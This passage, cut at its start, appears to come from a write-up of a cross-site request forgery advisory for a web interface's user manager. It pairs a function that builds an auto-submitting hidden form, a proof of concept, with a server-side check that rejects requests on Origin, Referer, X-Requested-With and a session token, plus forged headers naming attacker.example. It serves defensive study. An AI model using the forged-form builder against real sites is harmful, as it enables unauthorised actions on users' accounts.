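    application/x-www-form-urlencoded POST. What it cannot do is add the
    X-Requested-With header that the original XMLHttpRequest carried.
    """
    inputs = "".join(
        f'<input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
        for k, v in fields(body).items())
    return (f'<form id="f" method="POST" action="{html.escape(target)}">{inputs}</form>'
            '<script>document.getElementById("f").submit()</script>')


def reject_reason(headers: Dict[str, str], body: str,
                  session_token: str) -> Optional[str]:
    """Server-side gate: the reason the request is refused, or None to accept."""
    origin = headers.get("Origin")
    if origin is None and headers.get("Referer"):
        parts = urlsplit(headers["Referer"])
        origin = f"{parts.scheme}://{parts.netloc}"
    if origin != SITE_ORIGIN:
        return f"cross-site origin {origin!r}"
    if headers.get("X-Requested-With") != "XMLHttpRequest":
        return "no X-Requested-With: plain form post, not the UI's XHR"
    sent = fields(body).get("csrf_token", "")
    if not hmac.compare_digest(sent, session_token):
        return "missing or wrong csrf_token"
    return None


# Headers of the captured request (cookie omitted, as in the advisory).
CAPTURED_HEADERS = {
    "Host": "127.0.0.1:8080",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Referer": "http://127.0.0.1:8080/WebInterface/UserManager/index.html",
}
# Headers a browser attaches to the auto-submitted form from an attacker page.
FORGED_HEADERS = {
    "Host": "127.0.0.1:8080",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://attacker.example",
    "Referer": "http://attacker.example/poc.html",
}

if __name__ == "__main__":
    print(summarize(CAPTURED_BODY))
    print(reject_reason(FORGED_HEADERS, CAPTURED_BODY, "s3cret"))
    print(reject_reason(CAPTURED_HEADERS, CAPTURED_BODY, "s3cret"))
```

The three checks are layered on purpose: Origin is sent by current browsers on cross-site form posts and Referer by older ones, but both can be absent, and a custom header such as X-Requested-With only proves the request did not come from a plain form. The session-bound token compared with hmac.compare_digest is the control that does not depend on the browser, which is why the captured request, legitimate origin and all, is still refused for lacking one.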